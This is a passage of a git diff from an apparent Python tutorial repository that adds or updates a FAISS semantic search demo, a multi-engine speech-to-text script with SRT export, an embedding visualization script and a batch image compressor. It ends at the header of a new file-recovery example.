+    "Yoga combines physical postures, breathing techniques, and meditation for overall wellness",
+    "Getting seven to nine hours of quality sleep each night is essential for cognitive function",
+    "Strength training builds muscle mass and increases bone density, reducing injury risk",
+    "The stock market enables companies to raise capital by selling shares to public investors",
+    "Cryptocurrencies use cryptographic techniques to enable secure decentralized transactions",
+    "Venture capital firms invest in early-stage companies with high growth potential",
+    "Impressionist painters like Monet used loose brushstrokes to capture the effects of light",
+    "Jazz music originated in African American communities in New Orleans in the early 1900s",
+    "Hip hop culture emerged in the Bronx during the 1970s and includes rap, DJing, and breakdancing",
+]
+
+# Generate embeddings
+model = SentenceTransformer("all-MiniLM-L6-v2")
+embeddings = model.encode(documents, convert_to_numpy=True, normalize_embeddings=True)
+
+# Build FAISS index
+dimension = embeddings.shape[1]
+index = faiss.IndexFlatIP(dimension)
+index.add(embeddings.astype(np.float32))
+
+def semantic_search(query: str, top_k: int = 5):
+    """Return up to ``top_k`` result dicts ("score", "similarity_pct", "document") for the documents closest to ``query``."""
+    # The query is normalized like the corpus embeddings, so the inner-product score from IndexFlatIP is cosine similarity.
+    query_embedding = model.encode([query], convert_to_numpy=True, normalize_embeddings=True).astype(np.float32)
+    # FAISS pads missing hits with label -1, which would silently pick documents[-1]; never request more than exist.
+    scores, indices = index.search(query_embedding, min(top_k, len(documents)))
+    hits = zip(scores[0], indices[0])
+    return [{"score": float(score), "similarity_pct": f"{score * 100:.1f}%", "document": documents[idx]} for score, idx in hits]
+
+# Demo
+console.print(Panel("[bold cyan]Semantic Search Demo[/bold cyan]", border_style="blue"))
+queries = [
+    "How do I make pasta at home?",
+    "What causes earthquakes and volcanic eruptions?",
+    "Tell me about investing and saving money",
+    "Best places to visit in Asia",
+    "How to stay healthy and fit",
+    "I want to learn web development",
+    "What is the theory of evolution?",
+]
+
+for query in queries:
+    results = semantic_search(query, top_k=3)
+    console.print(f"\n[bold]Query:[/bold] [cyan]{query}[/cyan]")
+    for i, r in enumerate(results, 1):
+        console.print(f"  {i}. ({r['similarity_pct']}) {r['document'][:80]}")
+
+# Visualize with PCA
+pca = PCA(n_components=2, random_state=42)
+embeddings_2d = pca.fit_transform(embeddings)
+categories = ["Tech", "Science", "Cooking", "Travel", "Health", "Business", "Arts"]
+colors = ["#3b82f6", "#10b981", "#f59e0b", "#8b5cf6", "#ef4444", "#06b6d4", "#ec4899"]
+fig, ax = plt.subplots(figsize=(14, 10))
+docs_per_run = 3  # `documents` lists 3 entries per category at a time, cycling through all categories (not one contiguous block each)
+for i, cat in enumerate(categories):
+    mask = [(j // docs_per_run) % len(categories) == i for j in range(len(documents))]
+    ax.scatter(embeddings_2d[mask, 0], embeddings_2d[mask, 1], c=colors[i], label=cat, alpha=0.7, s=50, edgecolors='white', linewidth=0.5)
+ax.set_title("Document Embeddings Visualized with PCA\n384-dimensional vectors -> 2D projection", fontsize=14, fontweight='bold')
+ax.legend(loc='upper right')
+plt.tight_layout()
+plt.savefig('embedding_visualization.png', dpi=150)
+console.print("[green]Visualization saved![/green]")
diff --git a/machine-learning/speech-recognition/README.md b/machine-learning/speech-recognition/README.md
index 0fa9d3a6..316c18db 100644
--- a/machine-learning/speech-recognition/README.md
+++ b/machine-learning/speech-recognition/README.md
@@ -1,16 +1,70 @@
 # [How to Convert Speech to Text in Python](https://www.thepythoncode.com/article/using-speech-recognition-to-convert-speech-to-text-python)
-To run this:
-- `pip3 install -r requirements.txt`
-- To recognize the text of an audio file named `16-122828-0002.wav`:
-    ```
-    python recognizer.py 16-122828-0002.wav
-    ```
-    **Output**:
-    ```
-    I believe you're just talking nonsense
-    ```
-- To recognize the text from your microphone after talking 5 seconds:
-    ```
-    python live_recognizer.py 5
-    ```
-    This will record your talking in 5 seconds and then uploads the audio data to Google to get the desired output.
\ No newline at end of file
+
+This folder contains the original `SpeechRecognition` examples and a modern 2026 transcription script.
+
+## Modern script
+
+`speech_to_text_2026.py` supports:
+
+- OpenAI `gpt-4o-transcribe` / `gpt-4o-mini-transcribe`
+- Faster-Whisper local/offline transcription
+- Groq Whisper transcription
+- long-audio chunking
+- microphone recording
+- SRT subtitle export
+
+Install modern dependencies:
+
+```bash
+pip install -U openai faster-whisper groq sounddevice scipy
+```
+
+For audio/video conversion and long-file chunking, install FFmpeg too.
+
+Examples:
+
+```bash
+# Local/offline transcription
+python speech_to_text_2026.py 16-122828-0002.wav --engine faster-whisper --model small --language en
+
+# OpenAI transcription; requires OPENAI_API_KEY
+python speech_to_text_2026.py meeting.mp3 --engine openai --language en
+
+# Cheaper OpenAI model
+python speech_to_text_2026.py meeting.mp3 --engine openai --model gpt-4o-mini-transcribe --language en
+
+# Groq Whisper; requires GROQ_API_KEY
+python speech_to_text_2026.py meeting.mp3 --engine groq --language en
+
+# Generate subtitles locally
+python speech_to_text_2026.py video.mp4 --engine faster-whisper --model large-v3 --srt captions.srt
+
+# Record 8 seconds from the microphone, then transcribe
+python speech_to_text_2026.py --record 8 --engine faster-whisper --model small --language en
+```
+
+## Legacy examples
+
+To run the older examples:
+
+```bash
+pip3 install -r requirements.txt
+```
+
+Recognize the text of an audio file named `16-122828-0002.wav`:
+
+```bash
+python recognizer.py 16-122828-0002.wav
+```
+
+Output:
+
+```text
+I believe you're just talking nonsense
+```
+
+Recognize text from your microphone after talking for 5 seconds:
+
+```bash
+python live_recognizer.py 5
+```
diff --git a/machine-learning/speech-recognition/speech_to_text_2026.py b/machine-learning/speech-recognition/speech_to_text_2026.py
new file mode 100644
index 00000000..bc3f9706
--- /dev/null
+++ b/machine-learning/speech-recognition/speech_to_text_2026.py
@@ -0,0 +1,296 @@
+from __future__ import annotations
+
+import argparse
+import os
+import shutil
+import subprocess
+import tempfile
+import wave
+from dataclasses import dataclass
+from pathlib import Path
+from typing import Iterable, Literal
+
+
+@dataclass(slots=True)
+class Segment:
+    """One transcribed audio segment."""
+
+    start: float
+    end: float
+    text: str
+
+
+def seconds_to_srt_time(seconds: float) -> str:
+    """Format a duration given in seconds as an SRT timestamp (HH:MM:SS,mmm)."""
+    total_ms = round(seconds * 1000)  # switch to whole milliseconds before splitting into fields
+    total_secs, millis = divmod(total_ms, 1000)
+    total_mins, secs = divmod(total_secs, 60)
+    hours, minutes = divmod(total_mins, 60)
+    return f"{hours:02}:{minutes:02}:{secs:02},{millis:03}"
+
+
+def write_srt(segments: Iterable[Segment], output_path: str | Path) -> None:
+    """Write transcript segments to an SRT subtitle file.
+
+    Segments whose text is empty after stripping whitespace are skipped, and the
+    remaining cues are numbered consecutively from 1.
+
+    Args:
+        segments: Segments to export, in the order they should appear.
+        output_path: Destination file; written as UTF-8.
+    """
+    stripped = ((seg, seg.text.strip()) for seg in segments)
+    spoken = [(seg, caption) for seg, caption in stripped if caption]
+    srt_lines: list[str] = []
+    for number, (seg, caption) in enumerate(spoken, start=1):
+        timing = f"{seconds_to_srt_time(seg.start)} --> {seconds_to_srt_time(seg.end)}"
+        # One cue: index line, timing line, caption, then a blank separator line.
+        srt_lines += [str(number), timing, caption, ""]
+    Path(output_path).write_text("\n".join(srt_lines), encoding="utf-8")
+
+
+def convert_to_wav(input_path: str | Path, output_path: str | Path, sample_rate: int = 16_000) -> None:
+    """Convert any FFmpeg-readable audio/video file to a mono WAV at ``sample_rate`` Hz (16 kHz by default)."""
+    if not shutil.which("ffmpeg"):
+        raise RuntimeError("FFmpeg is required. Install it from https://ffmpeg.org/.")
+
+    subprocess.run(
+        [
+            "ffmpeg",
+            "-y",  # overwrite output_path without prompting
+            "-i",
+            str(input_path),
+            "-ac",  # number of audio channels: 1 = mono
+            "1",
+            "-ar",  # audio sample rate in Hz
+            str(sample_rate),
+            "-vn",  # drop any video stream
+            str(output_path),
+        ],
+        check=True,  # raises subprocess.CalledProcessError if ffmpeg exits non-zero
+        stdout=subprocess.DEVNULL,
+        stderr=subprocess.DEVNULL,  # NOTE: ffmpeg's own error output is discarded as well
+    )
+
+
+def chunk_wav(input_wav: str | Path, chunk_seconds: int = 600) -> list[Path]:
+    """Split a WAV file into chunks of at most ``chunk_seconds`` seconds, written to a sibling ``<stem>_chunks`` directory, without loading the whole file in memory."""
+    input_wav = Path(input_wav)
+    if chunk_seconds <= 0:
+        raise ValueError("chunk_seconds must be positive")
+
+    output_dir = input_wav.parent / f"{input_wav.stem}_chunks"
+    output_dir.mkdir(parents=True, exist_ok=True)
+
+    chunks: list[Path] = []
+    with wave.open(str(input_wav), "rb") as reader:
+        params = reader.getparams()
+        frames_per_chunk = int(params.framerate * chunk_seconds)
+        index = 1
+        while True:
+            frames = reader.readframes(frames_per_chunk)  # reads at most one chunk's worth of frames
+            if not frames:
+                break  # nothing left to read from the input
+            chunk_path = output_dir / f"chunk_{index:04d}.wav"
+            with wave.open(str(chunk_path), "wb") as writer:
+                writer.setparams(params)  # reuse the input's audio format parameters for the chunk
+                writer.writeframes(frames)
+            chunks.append(chunk_path)
+            index += 1
+    return chunks
+
+
+def transcribe_with_openai(
+    audio_path: str | Path,
+    *,
+    model: str = "gpt-4o-transcribe",
+    language: str | None = None,
+    prompt: str | None = None,
+) -> str:
+    """Transcribe audio using OpenAI speech-to-text models."""
+    try:
+        from openai import OpenAI
+    except ImportError as exc:
+        raise RuntimeError("Install the OpenAI SDK first: pip install openai") from exc
+
+    kwargs: dict[str, object] = {"model": model}
+    if language:
+        kwargs["language"] = language
+    if prompt:
+        kwargs["prompt"] = prompt
+
+    client = OpenAI()
+    with Path(audio_path).open("rb") as audio_file:
+        transcript = client.audio.transcriptions.create(file=audio_file, **kwargs)
+    return transcript.text
+
+
+def transcribe_large_file_with_openai(
+    input_path: str | Path,
+    *,
+    model: str = "gpt-4o-transcribe",
+    language: str | None = None,
+    prompt: str | None = None,
+    chunk_seconds: int = 600,
+) -> str:
+    """Convert, chunk, and transcribe a long file with OpenAI's API."""
+    with tempfile.TemporaryDirectory() as temp_dir:
+        temp_dir_path = Path(temp_dir)
+        wav_path = temp_dir_path / "audio.wav"
+        convert_to_wav(input_path, wav_path)
+        chunks = chunk_wav(wav_path, chunk_seconds=chunk_seconds)
+        parts = [
+            transcribe_with_openai(chunk, model=model, language=language, prompt=prompt)
+            for chunk in chunks
+        ]
+    return "\n".join(part.strip() for part in parts if part.strip())
+
+
+def transcribe_with_groq(
+    audio_path: str | Path,
+    *,
+    model: str = "whisper-large-v3-turbo",
+    language: str | None = None,
+    prompt: str | None = None,
+) -> str:
+    """Transcribe audio with Groq's OpenAI-compatible Whisper endpoint."""
+    try:
+        from groq import Groq
+    except ImportError as exc:
+        raise RuntimeError("Install the Groq SDK first: pip install groq") from exc
+
+    kwargs: dict[str, object] = {"model": model, "temperature": 0.0}
+    if language:
+        kwargs["language"] = language
+    if prompt:
+        kwargs["prompt"] = prompt
+
+    client = Groq(api_key=os.environ.get("GROQ_API_KEY"))
+    with Path(audio_path).open("rb") as audio_file:
+        transcript = client.audio.transcriptions.create(file=audio_file, **kwargs)
+    return transcript.text
+
+
+def transcribe_with_faster_whisper(
+    audio_path: str | Path,
+    *,
+    model_size: str = "large-v3",
+    device: Literal["auto", "cpu", "cuda"] = "auto",
+    compute_type: str = "auto",
+    language: str | None = None,
+) -> tuple[str, list[Segment]]:
+    """Transcribe audio locally with Faster-Whisper."""
+    try:
+        from faster_whisper import WhisperModel
+    except ImportError as exc:
+        raise RuntimeError("Install Faster-Whisper first: pip install faster-whisper") from exc
+
+    if device == "auto":
+        device = "cuda" if _cuda_is_available() else "cpu"
+    if compute_type == "auto":
+        compute_type = "float16" if device == "cuda" else "int8"
+
+    model = WhisperModel(model_size, device=device, compute_type=compute_type)
+    kwargs: dict[str, object] = {
+        "beam_size": 5,
+        "vad_filter": True,
+        "vad_parameters": {"min_silence_duration_ms": 500},
+    }
+    if language:
+        kwargs["language"] = language
+
+    raw_segments, _info = model.transcribe(str(audio_path), **kwargs)
+    segments = [Segment(start=s.start, end=s.end, text=s.text) for s in raw_segments]
+    return "".join(s.text for s in segments).strip(), segments
+
+
+def record_microphone(output_path: str | Path = "microphone.wav", seconds: int = 8, sample_rate: int = 16_000) -> Path:
+    """Record microphone audio to a WAV file."""
+    try:
+        import sounddevice as sd
+        from scipy.io.wavfile import write
+    except ImportError as exc:
+        raise RuntimeError("Install microphone dependencies: pip install sounddevice scipy") from exc
+
+    output_path = Path(output_path)
+    print(f"Recording for {seconds} seconds...")
+    audio = sd.rec(int(seconds * sample_rate), samplerate=sample_rate, channels=1, dtype="int16")
+    sd.wait()
+    write(output_path, sample_rate, audio)
+    print(f"Saved recording to {output_path}")
+    return output_path
+
+
+def _cuda_is_available() -> bool:
+    """Return True when PyTorch sees a CUDA GPU, without requiring torch at install time."""
+    try:
+        import torch
+
+        return bool(torch.cuda.is_available())
+    except Exception:
+        return False
+
+
+def main(argv: list[str] | None = None) -> int:
+    parser = argparse.ArgumentParser(description="Transcribe audio to text in Python.")
+    parser.add_argument("audio", nargs="?", help="Path to an audio/video file")
+    parser.add_argument("--engine", choices=("openai", "groq", "faster-whisper"), default="faster-whisper")
+    parser.add_argument("--model", default=None, help="Model name. Defaults depend on the engine.")
+    parser.add_argument("--language", default=None, help="Optional ISO-639-1 language hint, e.g. en, fr, es")
+    parser.add_argument("--prompt", default=None, help="Optional context prompt for API transcription")
+    parser.add_argument("--srt", default=None, help="Optional .srt output path (Faster-Whisper engine)")
+    parser.add_argument("--long", action="store_true", help="Convert/chunk long files before OpenAI transcription")
+    parser.add_argument("--chunk-seconds", type=int, default=600, help="Chunk size for --long, default: 600")
+    parser.add_argument("--record", type=int, metavar="SECONDS", help="Record from microphone first")
+    args = parser.parse_args(argv)
+
+    audio_path: Path
+    if args.record:
+        audio_path = record_microphone(seconds=args.record)
+    else:
+        if not args.audio:
+            parser.error("provide an audio file or use --record SECONDS")
+        audio_path = Path(args.audio)
+        if not audio_path.exists():
+            parser.error(f"File not found: {audio_path}")
+
+    if args.engine == "openai":
+        if args.long:
+            print(transcribe_large_file_with_openai(
+                audio_path,
+                model=args.model or "gpt-4o-transcribe",
+                language=args.language,
+                prompt=args.prompt,
+                chunk_seconds=args.chunk_seconds,
+            ))
+        else:
+            print(transcribe_with_openai(
+                audio_path,
+                model=args.model or "gpt-4o-transcribe",
+                language=args.language,
+                prompt=args.prompt,
+            ))
+        return 0
+
+    if args.engine == "groq":
+        print(transcribe_with_groq(
+            audio_path,
+            model=args.model or "whisper-large-v3-turbo",
+            language=args.language,
+            prompt=args.prompt,
+        ))
+        return 0
+
+    text, segments = transcribe_with_faster_whisper(
+        audio_path,
+        model_size=args.model or "large-v3",
+        language=args.language,
+    )
+    print(text)
+    if args.srt:
+        write_srt(segments, args.srt)
+    return 0
+
+
+if __name__ == "__main__":
+    raise SystemExit(main())
diff --git a/machine-learning/text-embeddings-visualization/embedding_analysis.py b/machine-learning/text-embeddings-visualization/embedding_analysis.py
new file mode 100644
index 00000000..01179276
--- /dev/null
+++ b/machine-learning/text-embeddings-visualization/embedding_analysis.py
@@ -0,0 +1,125 @@
+"""
+Text Embeddings: Generation, Comparison & Visualization
+========================================================
+Requirements: pip install sentence-transformers numpy matplotlib seaborn scikit-learn rich
+"""
+import numpy as np
+from sentence_transformers import SentenceTransformer
+import matplotlib; matplotlib.use('Agg')
+import matplotlib.pyplot as plt
+import seaborn as sns
+from sklearn.decomposition import PCA
+from sklearn.manifold import TSNE
+from sklearn.metrics.pairwise import cosine_similarity
+from rich.console import Console
+from rich.table import Table
+from rich.panel import Panel
+
+console = Console()
+
+# 50 sentences across 10 categories
+sentences = [
+    "The computer processed data at incredible speed",
+    "Machine learning models require large amounts of training data",
+    "Python is widely used for artificial intelligence applications",
+    "Cloud computing enables scalable web services",
+    "The algorithm optimized the search results efficiently",
+    "The dog chased the ball across the green field",
+    "Cats are independent creatures that enjoy solitude",
+    "The majestic eagle soared high above the mountains",
+    "Dolphins are highly intelligent marine mammals",
+    "The tiger stalked its prey through the dense jungle",
+    "The chef prepared a delicious Italian pasta dish",
+    "Fresh ingredients make the best homemade meals",
+    "The chocolate cake was rich and decadently sweet",
+    "Grilling steak requires high heat and proper timing",
+    "Japanese sushi demands precise knife skills and fresh fish",
+    "The ancient ruins attracted tourists from around the world",
+    "Paris is known as the city of love and romance",
+    "The tropical beach had crystal clear turquoise water",
+    "Mountain climbers reached the summit after days of effort",
+    "The bustling city never sleeps with its vibrant nightlife",
+    "She felt overwhelming joy when she received the good news",
+    "Heartbreak can feel like a physical pain in your chest",
+    "Their friendship had lasted through decades of ups and downs",
+    "Pride swelled in his chest as he watched his daughter graduate",
+    "Anxiety crept in as the deadline approached rapidly",
+    "The scientist conducted experiments to test the hypothesis",
+    "Mathematics is the language of the universe",
+    "Quantum physics challenges our understanding of reality",
+    "DNA contains the genetic blueprint of all living organisms",
+    "The theory of evolution explains the diversity of life",
+    "The soccer team celebrated their championship victory",
+    "Swimming is an excellent full-body cardiovascular workout",
+    "The marathon runner crossed the finish line exhausted but proud",
+    "Basketball requires both athleticism and strategic thinking",
+    "Yoga combines physical poses with breathing and meditation",
+    "The painter captured the sunset in brilliant orange and red hues",
+    "Music has the power to evoke deep emotional responses",
+    "The novelist spent years crafting the perfect ending",
+    "Dance allows expression beyond what words can convey",
+    "Photography freezes a single moment for eternity",
+    "The startup raised millions in venture capital funding",
+    "Effective leadership requires both vision and empathy",
+    "The company announced record profits for the fiscal year",
+    "Remote work has transformed the modern workplace",
+    "Negotiation skills are essential for closing major deals",
+    "Regular exercise reduces the risk of heart disease",
+    "The doctor prescribed antibiotics for the bacterial infection",
+    "Mental health is just as important as physical health",
+    "Vaccines have saved millions of lives throughout history",
+    "A balanced diet provides essential nutrients for the body",
+]
+categories = (["Tech"]*5 + ["Animals"]*5 + ["Food"]*5 + ["Travel"]*5 +
+              ["Emotions"]*5 + ["Science"]*5 + ["Sports"]*5 + ["Art"]*5 +
+              ["Business"]*5 + ["Health"]*5)
+
+# Generate embeddings
+model = SentenceTransformer("all-MiniLM-L6-v2")
+embeddings = model.encode(sentences, convert_to_numpy=True, normalize_embeddings=True)
+console.print(f"[green]Embeddings: {embeddings.shape}[/green]")
+
+# PCA
+pca = PCA(n_components=2, random_state=42)
+e2d = pca.fit_transform(embeddings)
+cat_colors = {"Tech":"#3b82f6","Animals":"#10b981","Food":"#f59e0b","Travel":"#8b5cf6",
+              "Emotions":"#ef4444","Science":"#06b6d4","Sports":"#f97316","Art":"#ec4899",
+              "Business":"#6366f1","Health":"#14b8a6"}
+fig, ax = plt.subplots(figsize=(16,11))
+for cat in sorted(set(categories)):
+    mask = [c==cat for c in categories]
+    ax.scatter(e2d[mask,0], e2d[mask,1], c=cat_colors[cat], label=cat, alpha=0.75, s=120, edgecolors='white')
+ax.legend(ncol=2); ax.set_title("PCA: Text Embeddings"); plt.tight_layout()
+plt.savefig('01_pca.png', dpi=150); plt.close()
+
+# t-SNE
+tsne = TSNE(n_components=2, perplexity=8, random_state=42, max_iter=1000)
+e2dt = tsne.fit_transform(embeddings)
+fig, ax = plt.subplots(figsize=(16,11))
+for cat in sorted(set(categories)):
+    mask = [c==cat for c in categories]
+    ax.scatter(e2dt[mask,0], e2dt[mask,1], c=cat_colors[cat], label=cat, alpha=0.75, s=120, edgecolors='white')
+ax.legend(ncol=2); ax.set_title("t-SNE: Text Embeddings"); plt.tight_layout()
+plt.savefig('02_tsne.png', dpi=150); plt.close()
+
+# Heatmap
+idx = [0,5,10,15,20,25,30,35,40,45]
+sim = cosine_similarity(embeddings[idx])
+fig, ax = plt.subplots(figsize=(14,12))
+sns.heatmap(sim, annot=True, fmt=".2f", cmap="YlOrRd", vmin=0, vmax=1, ax=ax)
+ax.set_title("Cosine Similarity Heatmap"); plt.tight_layout()
+plt.savefig('03_heatmap.png', dpi=150); plt.close()
+
+# Semantic similarity demo
+pairs = [("The dog played in the park","A canine ran through the green field"),
+         ("The dog played in the park","The stock market crashed yesterday"),
+         ("I love eating pizza and pasta","Italian cuisine is my favorite food"),
+         ("I love eating pizza and pasta","The spaceship launched into orbit")]
+for a,b in pairs:
+    ea = model.encode([a], normalize_embeddings=True)[0]
+    eb = model.encode([b], normalize_embeddings=True)[0]
+    sim = float(np.dot(ea,eb))
+    rel = "SAME" if sim > 0.5 else "DIFF"
+    console.print(f"  [{rel}] {sim*100:.1f}% — {a[:40]} <-> {b[:40]}")
+
+console.print("[green]Analysis complete![/green]")
diff --git a/python-for-multimedia/compress-image/README.md b/python-for-multimedia/compress-image/README.md
index 32f51450..919414cc 100644
--- a/python-for-multimedia/compress-image/README.md
+++ b/python-for-multimedia/compress-image/README.md
@@ -1,4 +1,56 @@
-# [How to Compress Images in Python](https://www.thepythoncode.com/article/compress-images-in-python)
-To run this:
-- `pip3 install -r requirements.txt`
-- `python compress_image.py --help`
\ No newline at end of file
+# Compress Image
+
+Advanced Image Compressor with Batch Processing
+
+This script provides advanced image compression and resizing features using Python and Pillow.
+
+## Features
+
+- Batch processing of multiple images or directories
+- Lossy and lossless compression (PNG/WebP)
+- Optional JPEG conversion
+- Resize by ratio or explicit dimensions
+- Preserve or strip metadata (EXIF)
+- Custom output directory
+- Progress bar using `tqdm`
+- Detailed logging
+
+## Requirements
+
+- Python 3.6+
+- [Pillow](https://pypi.org/project/Pillow/)
+- [tqdm](https://pypi.org/project/tqdm/)
+
+Install dependencies:
+
+```bash
+pip install pillow tqdm
+```
+
+## Usage
+
+```bash
+python compress_image.py [options] <input> [<input> ...]
+```
+
+## Options
+- `-o`, `--output-dir`: Output directory (default: same as input)
+- `-q`, `--quality`: Compression quality (0-100, default: 85)
+- `-r`, `--resize-ratio`: Resize ratio (0-1, default: 1.0)
+- `-w`, `--width`: Output width (requires `--height`)
+- `-hh`, `--height`: Output height (requires `--width`)
+- `-j`, `--to-jpg`: Convert output to JPEG
+- `-m`, `--no-metadata`: Strip metadata (default: preserve)
+- `-l`, `--lossless`: Use lossless compression (PNG/WEBP)
+
+## Examples
+
+```bash
+python compress_image.py image.jpg -r 0.5 -q 80 -j
+python compress_image.py images/ -o output/ -m
+python compress_image.py image.png -l
+```
+
+## License
+
+MIT License.
diff --git a/python-for-multimedia/compress-image/compress_image.py b/python-for-multimedia/compress-image/compress_image.py
index 6560b887..f1696aa0 100644
--- a/python-for-multimedia/compress-image/compress_image.py
+++ b/python-for-multimedia/compress-image/compress_image.py
@@ -1,88 +1,104 @@
 import os
 from PIL import Image
+import argparse
+import logging
+from tqdm import tqdm
 
+# Configure logging
+logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
+logger = logging.getLogger(__name__)
 
 def get_size_format(b, factor=1024, suffix="B"):
-    """
-    Scale bytes to its proper byte format
-    e.g:
-        1253656 => '1.20MB'
-        1253656678 => '1.17GB'
-    """
+    """Scale bytes to its proper byte format."""
     for unit in ["", "K", "M", "G", "T", "P", "E", "Z"]:
         if b < factor:
             return f"{b:.2f}{unit}{suffix}"
         b /= factor
     return f"{b:.2f}Y{suffix}"
-    
 
-
-def compress_img(image_name, new_size_ratio=0.9, quality=90, width=None, height=None, to_jpg=True):
-    # load the image to memory
-    img = Image.open(image_name)
-    # print the original image shape
-    print("[*] Image shape:", img.size)
-    # get the original image size in bytes
-    image_size = os.path.getsize(image_name)
-    # print the size before compression/resizing
-    print("[*] Size before compression:", get_size_format(image_size))
-    if new_size_ratio < 1.0:
-        # if resizing ratio is below 1.0, then multiply width & height with this ratio to reduce image size
-        img = img.resize((int(img.size[0] * new_size_ratio), int(img.size[1] * new_size_ratio)), Image.LANCZOS)
-        # print new image shape
-        print("[+] New Image shape:", img.size)
-    elif width and height:
-        # if width and height are set, resize with them instead
-        img = img.resize((width, height), Image.LANCZOS)
-        # print new image shape
-        print("[+] New Image shape:", img.size)
-    # split the filename and extension
-    filename, ext = os.path.splitext(image_name)
-    # make new filename appending _compressed to the original file name
-    if to_jpg:
-        # change the extension to JPEG
-        new_filename = f"{filename}_compressed.jpg"
-    else:
-        # retain the same extension of the original image
-        new_filename = f"{filename}_compressed{ext}"
+def compress_image(
+    input_path,
+    output_dir=None,
+    quality=85,
+    resize_ratio=1.0,
+    width=None,
+    height=None,
+    to_jpg=False,
+    preserve_metadata=True,
+    lossless=False,
+):
+    """Compress an image with advanced options."""
     try:
-        # save the image with the corresponding quality and optimize set to True
-        img.save(new_filename, quality=quality, optimize=True)
-    except OSError:
-        # convert the image to RGB mode first
-        img = img.convert("RGB")
-        # save the image with the corresponding quality and optimize set to True
-        img.save(new_filename, quality=quality, optimize=True)
-    print("[+] New file saved:", new_filename)
-    # get the new image size in bytes
-    new_image_size = os.path.getsize(new_filename)
-    # print the new size in a good format
-    print("[+] Size after compression:", get_size_format(new_image_size))
-    # calculate the saving bytes
-    saving_diff = new_image_size - image_size
-    # print the saving percentage
-    print(f"[+] Image size change: {saving_diff/image_size*100:.2f}% of the original image size.")
-    
-    
+        img = Image.open(input_path)
+        logger.info(f"[*] Processing: {os.path.basename(input_path)}")
+        logger.info(f"[*] Original size: {get_size_format(os.path.getsize(input_path))}")
+
+        # Resize if needed; the ratio wins, explicit width/height only apply when ratio >= 1.0
+        if resize_ratio < 1.0:
+            new_size = (int(img.size[0] * resize_ratio), int(img.size[1] * resize_ratio))
+            img = img.resize(new_size, Image.LANCZOS)
+            logger.info(f"[+] Resized to: {new_size}")
+        elif width and height:
+            img = img.resize((width, height), Image.LANCZOS)
+            logger.info(f"[+] Resized to: {width}x{height}")
+
+        # Prepare output path (next to the input unless output_dir is given)
+        filename, ext = os.path.splitext(os.path.basename(input_path))
+        output_ext = ".jpg" if to_jpg else ext
+        output_filename = f"{filename}_compressed{output_ext}"
+        output_path = os.path.join(output_dir or os.path.dirname(input_path), output_filename)
+
+        # Save with options; the source EXIF is only written out if it is passed explicitly
+        save_kwargs = {"quality": quality, "optimize": True}
+        # Forward the source EXIF block to preserve metadata, an empty one to strip it
+        save_kwargs["exif"] = img.info.get("exif", b"") if preserve_metadata else b""
+        if lossless and output_ext.lower() in (".png", ".webp"):
+            save_kwargs["lossless"] = True
+
+        try:
+            img.save(output_path, **save_kwargs)
+        except OSError:
+            # Retry in RGB mode for images whose mode the target format rejects
+            img = img.convert("RGB")
+            img.save(output_path, **save_kwargs)
+
+        logger.info(f"[+] Saved to: {output_path}")
+        logger.info(f"[+] New size: {get_size_format(os.path.getsize(output_path))}")
+    except Exception as e:
+        logger.error(f"[!] Error processing {input_path}: {e}")
+
+def batch_compress(
+    input_paths,
+    output_dir=None,
+    quality=85,
+    resize_ratio=1.0,
+    width=None,
+    height=None,
+    to_jpg=False,
+    preserve_metadata=True,
+    lossless=False,
+):
+    """Compress multiple images."""
+    if output_dir and not os.path.exists(output_dir):
+        os.makedirs(output_dir, exist_ok=True)
+    for path in tqdm(input_paths, desc="Compressing images"):
+        compress_image(path, output_dir, quality, resize_ratio, width, height, to_jpg, preserve_metadata, lossless)
+
 if __name__ == "__main__":
-    import argparse
-    parser = argparse.ArgumentParser(description="Simple Python script for compressing and resizing images")
-    parser.add_argument("image", help="Target image to compress and/or resize")
-    parser.add_argument("-j", "--to-jpg", action="store_true", help="Whether to convert the image to the JPEG format")
-    parser.add_argument("-q", "--quality", type=int, help="Quality ranging from a minimum of 0 (worst) to a maximum of 95 (best). Default is 90", default=90)
-    parser.add_argument("-r", "--resize-ratio", type=float, help="Resizing ratio from 0 to 1, setting to 0.5 will multiply width & height of the image by 0.5. Default is 1.0", default=1.0)
-    parser.add_argument("-w", "--width", type=int, help="The new width image, make sure to set it with the `height` parameter")
-    parser.add_argument("-hh", "--height", type=int, help="The new height for the image, make sure to set it with the `width` parameter")
+    parser = argparse.ArgumentParser(description="Advanced Image Compressor with Batch Processing")
+    parser.add_argument("input", nargs='+', help="Input image(s) or directory")
+    parser.add_argument("-o", "--output-dir", help="Output directory (default: same as input)")
+    parser.add_argument("-q", "--quality", type=int, default=85, help="Compression quality (0-100)")
+    parser.add_argument("-r", "--resize-ratio", type=float, default=1.0, help="Resize ratio (0-1)")
+    parser.add_argument("-w", "--width", type=int, help="Output width (requires --height)")
+    parser.add_argument("-hh", "--height", type=int, help="Output height (requires --width)")
+    parser.add_argument("-j", "--to-jpg", action="store_true", help="Convert output to JPEG")
+    parser.add_argument("-m", "--no-metadata", action="store_false", help="Strip metadata")
+    parser.add_argument("-l", "--lossless", action="store_true", help="Use lossless compression (PNG/WEBP)")
+
     args = parser.parse_args()
-    # print the passed arguments
-    print("="*50)
-    print("[*] Image:", args.image)
-    print("[*] To JPEG:", args.to_jpg)
-    print("[*] Quality:", args.quality)
-    print("[*] Resizing ratio:", args.resize_ratio)
-    if args.width and args.height:
-        print("[*] Width:", args.width)
-        print("[*] Height:", args.height)
-    print("="*50)
-    # compress the image
-    compress_img(args.image, args.resize_ratio, args.quality, args.width, args.height, args.to_jpg)
\ No newline at end of file
+    input_paths = []
+    for path in args.input:
+        if os.path.isdir(path): input_paths.extend(os.path.join(path, f) for f in os.listdir(path) if f.lower().endswith((".jpg",".jpeg",".png",".webp")))
+        else: input_paths.append(path)
+    if not input_paths: logger.error("No valid images found!"); exit(1)
+    batch_compress(input_paths, args.output_dir, args.quality, args.resize_ratio, args.width, args.height, args.to_jpg, args.no_metadata, args.lossless)
diff --git a/python-for-multimedia/recover-deleted-files/README.md b/python-for-multimedia/recover-deleted-files/README.md
new file mode 100644
index 00000000..9b57b100
--- /dev/null
+++ b/python-for-multimedia/recover-deleted-files/README.md
@@ -0,0 +1 @@
+# [How to Recover Deleted Files with Python](https://thepythoncode.com/article/how-to-recover-deleted-file-with-python)
\ No newline at end of file
diff --git a/python-for-multimedia/recover-deleted-files/file_recovery.py b/python-for-multimedia/recover-deleted-files/file_recovery.py
new file mode 100644
index 00000000..057995c4
--- /dev/null
